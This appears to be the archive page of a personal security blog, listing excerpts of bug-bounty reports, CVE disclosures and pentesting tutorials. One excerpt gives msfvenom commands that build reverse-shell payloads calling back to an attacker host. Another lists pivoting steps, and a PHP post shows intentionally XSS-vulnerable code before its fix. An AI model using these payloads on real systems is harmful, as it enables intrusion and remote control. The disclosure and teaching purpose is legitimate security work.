Wednesday, 22 June 2022
Saturday, 5 February 2022
Apple Stored XSS : $5000 Bounty
Apple Stored XSS : $5000
Friday, 2 April 2021
My Journey In Suma Soft From Stammer To Millionaire
My Journey In Suma Soft From Stammer To Millionaire - imnarendrabhati
Tuesday, 15 December 2020
Address Bar Spoofing Vulnerability in Multiple Browsers
Address Bar Spoofing Vulnerability in Multiple Browsers(Jio Browser, Apple Safari Browser, BitDefender SafePay Browser and F-Secure Browser)
Jio Android Browser Address Bar Spoofing Vulnerability (Jio Browser, Apple Safari Browser, BitDefender SafePay Browser and F-Secure Browser)
Saturday, 11 May 2019
Bank Vulnerability : Accessing Account Information of Other Users One in the Top 5 Private Bank Vulnerability -
I have found on "One of the Top 5 Bank" iPad Version application end of the last year Nov 23rd 2018 which is fixed on 10th May 2019.
Saturday, 24 November 2018
Indian Mutual Fund Customer Data Is On Risk | Mutual Funds Vulnerability
Indian Mutual Fund Customer Data Is On Risk | Mutual Funds Vulnerability
Monday, 5 November 2018
Pentesting CMS : Wordpress Joomla Drupal
Wednesday, 4 July 2018
Information Security Controls
These controls facilities an organisation to keep his Information Confidentiol from external or internal attacks, Its maintain and help organisation to keep running their system after any attacks.
Its also proview you an view that how much your Information secure.
Here are some important thing which you should be covered under Information Security Controls.
- This rule comes under the physical security , In this set each and every person should be pass into the organisation by well managed physical security which should be monitor properly to identify the unknown Intruder.
- Every information which generated or produce in an Organisation should be properly backup time to time to prevent data loss due to hacking attempt and system failure, Its also recommended to create an extreme back and restore system which should run and managed properly.
- Incident Response should be there to perform an immediate reply for any incident which can be anything like , Fire attack , physical attacker or any technical hacking attack.
- Keep you employee Train And Educated about Any incident its also covered in Information Security Controls , If your employee is well trained about these types of situation then there will be less chance of any loss in an organisation.
- Log monitoring Must be in organisation to identify the Inside and outsider attack before the incident happened , Many organisation use Log Monitoring for their web application and internal system , Incoming and outgoing traffic.
1. Network Security
Security management is the classification of an organization assets inventory which should be followed by proper guidelines , rules set and documentation.Many organisation create Security Policies which should followed by his employee. Like no employee can bring any storage devices in office primasius which decrease the risk of insider data theft.
4. Physical Security
Physical Security its also an important factor for an organisation to identify an unknown intruder or attacker, decrease the risk of business loss like fire attack , earth quake or any natural or unnatural attack.
Many things are comes under the Physical Security Like , CCTV Cameras, Security Guards , Fire Preventions Systems
Entry Gates authentication such like Finger Print Scanner or Eye Detection Mechanism.
5. Business Continuity & DR Planning
Business Continuity & DR Planning allow an organisation to keep running his business regularly if he is/was under attack , Data loss or system failure.
This control managed the whole data of an organisation which automatically back up time by time , to restore in case of data loss or any hacking attack.
6. Operations Security
OPSEC ( Operation Security ) Covers unwanted or unintended risk which can be performed against us,OPSEC maintain these all things to take care that is there any information can be used against us or not.
7.Application/System Security
Application/System Security is an major control for an organisation to maintain his on-line identify safe and confidential. This controls covers that we should maintain our Application/System Security by different technologies like Firewall , IPS , SIEM and Other Log Monitoring Systems.
This will help an organisation to keep them self secure before or while the attack.
Zooc
Zooc2
RainbowFile
RainBowTemp
Flask1
Flask2
Flask3
Flask4
Flask4
Flask5
T8
DO
CSPMM
Forms5
brv
Tap
Petal
AutoSave
AutoFetch
1. Set Same Site Cookie
2. Verify Same-Site Cookie Are Set Ot Not.
CommonW
RainbowiOSWallet
Connect
ConnectI
File3
Click4
MMCM2
CSP
CoreRT2
RBAndrodConnect
R10L
R10
R10M
SS
Prompt1
Prompt2
All3
All3Long
File5
Tuesday, 3 July 2018
Attacking JSON Application : Pentesting JSON Application
Hello all, Its quite long time i have dosn`t updated my blog. So here we go.
Today we will see how we can pentest JSON Web Application.
Note- Some of the methods are taken from third party resources and some are presented as my personal experience.
First What Is JSON According To JSON Website.
JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999
"In a lemon language JSON is typically used Javascript to pass the parameter". Like Below HTTP Request.
GET /site/getuserinfo=narendrabhati HTTP/1.1
Host: websecgeeks.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Content-Type: application/json;
Saturday, 30 June 2018
Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass
Hello All While pentesting an application we might face some problem of Brute Force Protection , Login Attempt Protection And Captcha Based Protection , So today we will see how can "Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass"
First of all we will not use any kind of ready made tools for this , So lets begin !
Many people will think that this is a small issue, But if we look closely an attacker point of view then we will came to know , that By Brute Forcing any login panel can allows an attacker to gain administrative privilege instead of looking for vulnerabilities like RCE , SQL Injection and other critical vulnerability which might also allow us to take the Root or Administrator Level access.
Here i am describing many different techniques which i have observed while pentesting or hunting bugs.
Friday, 29 June 2018
Backup Vulnerability Vulnerability Exploitation
Friday, 29 June 2018
JSON Hijacking
JSON Hijacking
Today we will see that, How we can find the
JSON Hijacking vulnerability. As we know that this works on older browsers, still we should analyse it because this is a miss-understood/less known vulnerability for many security people. I hope you will like it.
What is JSON Hijacking?
JSON Hijacking is similior to CSRF(Cross Site Request Forgery) but there is just a little bit difference, In CSRF you trick the victim/user to do some malicious/unwanted activity but in JSON Hijacking you trick the user to access a crafted link which will read some data form victim account and pass it to attacker.
Who Are Affected To This?
This vulnerability is already fixed in modern browser, Like as of now if victim is using modern browser it cannot be exploited. But still if any one is using an older browser it can be attacked.
How We Can Find JSON Hijacking Vulnerability
Tuesday, 26 September 2017
Yandex IMAP Brute Forcing(No Rate Limit For Login Attempts)
Sunday, 23 April 2017
iOS Application Pentesting Part 5 : Insecure HTTP Data Transit
Just like Transmitting Sensitive Credentials Over HTTP, Application which used HTTP to communicate with their server and don`t using any kind of encryption are vulnerable to this issues.
In iGoat application, there is a simple demonstration that username & password passed in application is transmitting over http and without any encryption as result an attacker can capture/sniff those packages and could hijack victim`s account.
Sunday, 23 April 2017
Pentesting Node.js Application : Nodejs Application Security
Pentesting Node.js Application : Nodejs Application Security
Sunday, 16 April 2017
iOS Application Pentesting Part 4 : Installing iGoat Application
![]() |
| Picture taken from : https://www.owasp.org/index.php/OWASP_iGoat_Project |
To perform hands on practice and learning we will use iGoat iOS Application part of OWASP Security Project. You can find their Github page here. This Mobile Application is designed as vulnerable for Security Professionals and learner to enhanced their Skills over iOS Application Pentesting.
This project is Maintained by following folks.
Swaroop
masbog
mtesauro
DinisCruz
Here is the Project Details
For later practices we will install this application XCode and run it, But i recommended you to use a Physical device while performing pentesting.
Thursday, 13 April 2017
iOS Application Pentesting Part 3 : Extracting iOS App Class Information
Every application has his own group of codes which contents lots of information about the functionality and so on. It will always better if we can extract all the possible information about our application which we are going to attack.
Toady we will see How to Extract Class Information Of iOS Application.
Apple has made some modification in their security and now days most the app store apps are encrypted which first need to decrypt to extract class information.
So first we will see class dumping of non-encrypted apps.
Dumping Class Information Of Pre-Installed Applications
We have 2 ways the find the app.
2) If the app is customly installed using IPA file then his save directory would be Applications/
I am using the command line search for Damm Vulnerable iOS Application which is developed by Prateek Gianchandani.
Thursday, 13 April 2017
iOS Application Pentesting Part 2 : iOS Application Basics
In todays post, we will see iOS Application. Knowing our enemy before attacking is very important for us ;)
iOS : If i can say in simple words, Its an Operating System which run various iDevices which is create By Apple Inc.
iOS (formerly iPhone OS) is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod Touch. It is the second most popular mobile operating system globally after Android. iPad tablets are also the second most popular, by sales, against Android since 2013.[9]
Tuesday, 11 April 2017
iOS Application Pentesting Part 1 : Setting Up The Attacking Environment
iOS Application Pentesting Part 1 : Introduction To iOS
Note - For this particular tutorial we will use Xcode Simulator but highly recommended you to get A Jailbreak Device if you are very serious about learning iOS Application Pentesting.
Tuesday, 11 April 2017
Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network
Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network
Tuesday, 11 April 2017
Slack Rate Limit Bypass
Slack Rate Limit Bypass
Monday, 10 April 2017
Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting
Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting
Monday, 10 April 2017
Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting
Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting
Now we will see, How can we use those Extracted Community strings for Post Exploitation.
To perform We will use various tools as mention below.
Monday, 10 April 2017
Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network
Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network
We also consider that, attacker dont have idea about the System C IP Address.
Pivoting can be achieved in below steps.
- Compromise primary target machine (System A)
- Search for System network interfaces.
- Add route to metasploit session of System A.
- Run Proxy server
- Scan the Second target machine (System B)
- Port forwarding
- Perform Exploit
Sunday, 9 April 2017
Default Credentials Vulnerability : Attacking Network - Network Pentesting
Default Credentials Vulnerability : Attacking Network - Network Pentesting
Sunday, 9 April 2017
Generating Metasploit Payloads : Creating Metasploit Reverse Shell
Generating Metasploit Payloads : Creating Metasploit Reverse Shell
Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.
These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler
Mention payloads require certain inputs as an option such as LHOST, LPORT.
Operating System Based Bionaries Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho
Web Payloads : Usually For RFI, SQL Injection
Sunday, 9 April 2017
Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting
Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting
Wednesday, 5 April 2017
Penetration Testing with Kali Linux OSCP Review and Course, Lab experience — My OSCP Review :Try Harder! ;)
Wednesday, 23 November 2016
Slack Stored XSS(Cross Site Scripting)
Slack Stored XSS(Cross Site Scripting)
Hello Guys,
From a very long, I didn't`t write any blog post. :(
Well, Today we are going to see a Vulnerability in Slack Of Stored XSS(Cross Site Scripting) :)
One of the Slack URI - https://api.slack.com/apps/[appid]/general is not handling the user input properly, In a "name" parameter.
The input is getting reflected into the page without being properly sanitised or filtered, As a result it was possible for an attacker to Triager a Stored XSS Attack.
Interesting thing is that, This vulnerability can be exploited on other team and his member, As per this behaviour Slack Awarded $1000 for this vulnerability.
Wednesday, 24 August 2016
Asus SQL Injection Vulnerability
Wednesday, 24 August 2016
Hostgator Open Redirection And Reflected XSS Vulnerability
Tuesday, 23 August 2016
0 Desk Reflected XSS
Sunday, 15 May 2016
Web2py Vulnerabilities 2.14.5 : LFI,XSS,CSRF,Brute Force Attack
Web2py Vulnerabilities
This post is about Web2py Vulnerabilities which we have found, POC`s are created under Mac OS X EI Capitan, But also tested on windows 7 as well as linux platform.
#Download the vulnerable App - https://drive.google.com/file/d/0B-LjC3oY6tUpZlNkV3BnZU85Y0E/view?usp=sharing
# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF, Brute Force On Login
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808, Login Brute Force - CVE-2016-10321
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/imnarendrabhati
# Twitter : http://twitter.com/imnarendrabhati
Tuesday, 22 March 2016
Wednesday, 2 March 2016
Hacking Facebook Polls: Access Control Vulnerability
Hacking Facebook Polls - Poll Access Control Vulnerability: Dead Pool Version
Hello All,
Its been very long time that i am not in bug bounty things due to some reasons.Today we will see how i was able to do Hacking Facebook Polls.While surfing facebook groups, There is an module called "Polls" who got my attention. Using this module "Polls" admin/group members can create polls to get group members re-actions.
Basically the vulnerability is about "Access Control" in facebook polls, There are two controls which facebook offers and one of them is "Allow anyone to add options". If poll creator has disabled this option then users cant add more options to the poll, Even admin cant & if it is not disabled then any group member can add more options to the poll.
Analysis Part
Monday, 22 February 2016
OWASP Pune Chapter : Dive Into The Profound Web Attacks
PPT Url – http://www.slideshare.net/bhati123/owasp-pune-chapter-dive-into-the-profound-web-attacks-58494512
Thursday, 10 September 2015
Web2py 2.9.11 Open Redirection Vulnerability , CVE-2015-6961
Web2py Open Redirection Vulnerability Technical Details & POC.
# Vulnerability Title : Web2py 2.9.11 Open Redirection Vulnerability
# Reported Date : 27-Jan-2014
# Fixed Date : 2-July-2015
# Author : Narendra Bhati
# CVE ID : CVE-2015-6961
# Additional Links –
* https://github.com/web2py/web2py/issues/731
Thursday, 27 August 2015
Wolf CMS Arbitrary File Upload To Command Execution - CVE-2015-6567 ,CVE-2015-6568
Full Technical Disclosure Of Wolf CMS Arbitrary File Upload To Command Execution
# Exploit Title : Wolf CMS 0.8.2 Arbitrary File Upload To Command Execution
# Reported Date : 05-May-2015
# Fixed Date : 10-August-2015
# Exploit Author : Narendra Bhati
# CVE ID : CVE-2015-6567 , CVE-2015-6568
# Additional Links -
* https://github.com/wolfcms/wolfcms/releases/
* https://www.wolfcms.org/blog/2015/08/10/releasing-wolf-cms-0-8-3-1.html
1. Description
Friday, 8 May 2015
Testing Of Broken Session Management & Authorization By Burp
Hello all folks ,Nice to meet you again guyzz !
Today we will see that how we can do Testing Of Broken Session Management & Authorization By Burp Suite Quickly against an large application which contents thousands of pages , Like financial application also like banking application.
This can be very informative for those new guyz who dont know about it and for those also who also know about it already , i am just showing you that how we can do this more quickly with some percentage of accuracy because nothing is perfect ! :)
===================================================================
Tuesday, 31 March 2015
Abusing Windows Opener To Bypass Certain Restriction ( CSRF Bypass )
Hello all =D , Hope you are doing well
Today we will see that how we can Abuse Windows Opener function to bypass certain restriction in web application.
So first lets see what is Windows Opener Function
According To Mozilla Developer Guide
When a window is opened from another window, it maintains a reference to that first window aswindow.opener. If the current window has no opener, this method returns NULL. Windows Phone browser does not support window.opener. It is also not supported in IE if the opener is in a different security zone.
===================================================================
Monday, 26 January 2015
NPDS CMS SQL Injection - CVE-2015-1400
Hello folks ! its a long time left i did not write any finding from 2 months , So today i will share one of my finding about NPDS CMS Time Based SQL Injection
What Is NPDS CMS - Beyond content management 'classic', NPDS implements a set of functions specifically dedicated to the management of community and collaborative working groups.
This is a C ontent & C ommunity M anagement S ystem ( CCMS) robust, secure, complete, efficient and really speaking French. Manage your community of users, your collaborative work groups, publish, manage and organize your content with powerful tools available basis.
You can find more about NPDS CMS from this link
So lets come to the finding !
Sunday, 9 November 2014
X3 CMS XSS And CSRF "CVE-2014-8771 , CVE-2014-8772"
Hello all friends , today i am disclosing the issue which i found in X3CMS ( 0.5.1 & 0.5.1.1 )
So Here Is The X3 CMS XSS And CSRF
There were two vulnerabilities ,
- 1.) CSRF
- 2.) Reflected XSS [POST]
Sunday, 2 November 2014
Modx XSS And CSRF Bypass "CVE-2014-8773 , CVE-2014-8774 , CVE-2014-8775"
Hello all Bro`s :) ;) , Leets and learners , Hope you all are well and enjoying your bounties as well as ;)
Today we will see how i got Modx XSS And CSRF Bypass ( Modx CSRF + XSS = A Perfect Disaster ) ;)
Attacker Scenario Is Inspired From Symantec CSRF
So What Is Modx
MODX is the web content management system (CMS) that gives you complete control over your site and content, with the flexibility and scalability
Sunday, 26 October 2014
Linkedin Clickjacking
Hello All , Hope you all are well , Today i will show you Linkedin Clickjacking vulnerability which i was found in almost 1 year before ,
Be frank side at the starting of my carrier in information security i liked Clickjacking Vulnerability very much , because its easy to find and exploiting for any attacker,
One day i was searching for some common bugs in linkedin and suddenly i found that one of their share page "https://www.linkedin.com/shareArticle?" which used for Sharing Cross Domain Content you users profile is vulnerable to Click Jacking , at that time i was able to load that page in an iframe as you can see the POC
Saturday, 25 October 2014
Prevent XSS In PHP
Hello all today we will see that how we can Prevent XSS In PHP
I am posting this for newbies or fresher who are want to know about that , So here i am using a Simple PHP Code for better understanding
I am also a newby in PHP and will try my best to help you as much as i can
====================================================
<IMG STYLE=”position:absolute; TOP:100px; LEFT:500px; WIDTH:600px; HEIGHT:300px” SRC=”/wp-content/uploads/2014/06/21.jpg”>
<?php
if(isset($_GET[search]))
$display= $_GET[search];
echo “You searched for ” . $display ;
?>
<html>
<title>Testing Application of Websecgeeks</title>
<form name=”searchsomething” method=”GET” action=”xssfixing.php”>
<p>Search For Content</p><input type=”text” input name=”search”/><br><br>
<input type=”submit” input name=”submit” value=”Search Content”/>
</form>
====================================================
Here You can see we are taking an input from search field called “search” and storing the value of it into the “display” variable and using the same variable for displaying the entered text without filtration or sanitation
It is a simple sign of XSS vulnerability,
For Prevent this we can use htmlentities or htmlspecialcharactors function , Which will be nneedfulyou will know at the end
You can use
htmlentities($variablenamewhichisdisplayingtheuserinput) ,
Exa. – According to our code – htmlentities($display)
htmlspecialcharactors($variablenamewhichisdisplayingtheuserinput)
Exa. – According to our code -htmlspecialcharactors($display)
=====================================================
Lets applied this same in our code
<IMG STYLE=”position:absolute; TOP:100px; LEFT:500px; WIDTH:600px; HEIGHT:300px” SRC=”/wp-content/uploads/2014/06/21.jpg”>
<?php
if(isset($_GET[search]))
$display= $_GET[search];
echo “You searched for ” . htmlentities($display) ;
?>
<html>
<title>Testing Application of Websecgeeks</title>
<form name=”searchsomething” method=”GET” action=”xssfixing.php”>
<p>Search For Content</p><input type=”text” input name=”search”/><br><br>
<input type=”submit” input name=”submit” value=”Search Content”/>
</form>
====================================================
Step By Step Video
As you can see that we have added htmlentities function right before the $display variable to prevent XSS Attack
use htmlspecialcharactors or htmlentities function for filtration or sanitation , If your site is UTF8 encoded then you should htmlspecialcharactor function and use htmlentities is only if your pages use encodings such as ASCII or LATIN-1 instead of UTF-8.
Comment below if you feel any problem or have queries
Note – Thanks for all your feedback on facebook , this post will update soon with other techniques also , Thanks
Monday, 20 October 2014
Google XSS Vulnerability
Hello friends today i will show you how i Got Google XSS Vulnerability ,When i searching in google support section i think may be i should try to finding xss here ,Then i start trying ,First as usual i put my name in search box " bhati "
Google XSS Vulnerability
Monday, 20 October 2014
Exposed Session Variables-Exploitation
Hello all folks and dear friends this post is specially dedicated to learners and also if you dont know about this vulnerability or can say exploitation And if you already know about it , then you can Re-Read it again , Reading is this is absolutely free =D ;) sorry for the Bad joke
=============================================================================================
Today we will talk about the Exposed Session Variables-Exploitation and how we can exploit the same in real attack scenario !
Sunday, 5 October 2014
Heroku XSS
s , Bhaiya Jis, i was quite busy in my office work and etc , thats why i was unable to write some good stuffsWell , Today we will talk about Heroku XSS ,
Lets come to the point , First i want to tell you that , while testing Heroku i was thinking that i cant find something interesting , because many researchers have already discovered many things , So The Chance For A Valid Bug Is Quite Low =D
==========================================================================================
Wednesday, 25 June 2014
Wordfence Firewall Plugin XSS "CVE-2014-4664"
So lets come to post
Today we will see that how i got "Word Press Firewall Plugin Wordfence XSS"
Monday, 23 June 2014
Referrer CSRF Bypass ( Not Effective But Alternative )
Monday, 7 April 2014
Google CSRF Feedburner , CSRF , Google , Hacking , Bug Bounty ,Vulnerability
Google CSRF Feedburner
Hello all . here so much days passed i dint any write anything about web app security
So today i am going to share you a finding with you of "Google CSRF Feedburner"
So here we go ! ;-) & sorry for the grammar mistakes :p
==========================================================
Sunday, 16 February 2014
Facebook User Enumeration Vulnerability By Bypassing Brute ForceProtection
Hello all readers today i am going to show you that how i got user enumeration vulnerability in facebook "Facebook User Enumeration" Vulnerability
Sunday, 1 December 2013
Facebook Brute Force Attack Vulnerability
Welcome back all l33ts :-)
Today i am going to show you that how i got Brute Force Attack Vulnerability in Facebook "Facebook Brute Force" Attack Vulnerability ( Reported On 11-4-2013 )
first we have to know that what is Brute force attack vulnerability
According to OWASP
A common threat web developers face is a password-guessing attack known as a brute force attack. A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works. If your web site requires user authentication, you are a good target for a brute-force attack etc. :-)
So lets move to the interesting part
Wednesday, 27 November 2013
"Sourceforge Brute Force" Attack Vulnerability ,Sourceforge Brute Force
I want to share my finding "Sourceforge Brute Force" Attack Sourceforge.com which I have reported to Source Forge Security Team on 25th October 2013.
Saturday, 16 November 2013
Net Protector XSS Content Spoofing Antivirus .Net Protector Anti VirusXSS And Content Spoofing Vulnerability
Hello all this post is about "Net Protector Anti Virus XSS And Content Spoofing Vulnerability"
Wednesday, 24 April 2013
Symantec CSRF Bypass Vulnerability
Hello friends here i came with another vulnerability article
Symantec Antivirus Well Known Anti Virus Official Website Vulnerable To CSRF Vulnerability...
First i go to symantec customer log in page and created my own test accounting for testing....I Switch to Live Http Headers , and then i suck , Why !! there is a CSRF Tokens called "Nonce"
Wednesday, 24 April 2013
Time Now XSS , Vulnerability
"Time Now XSS" Vulnerability A Cute XSS Which I Have Found
Tuesday, 23 April 2013
Rediffmail Clickjacking
Rediffmail Vulnerable To Click Jacking Vulnerability ( Rediffmail Clickjacking )

















































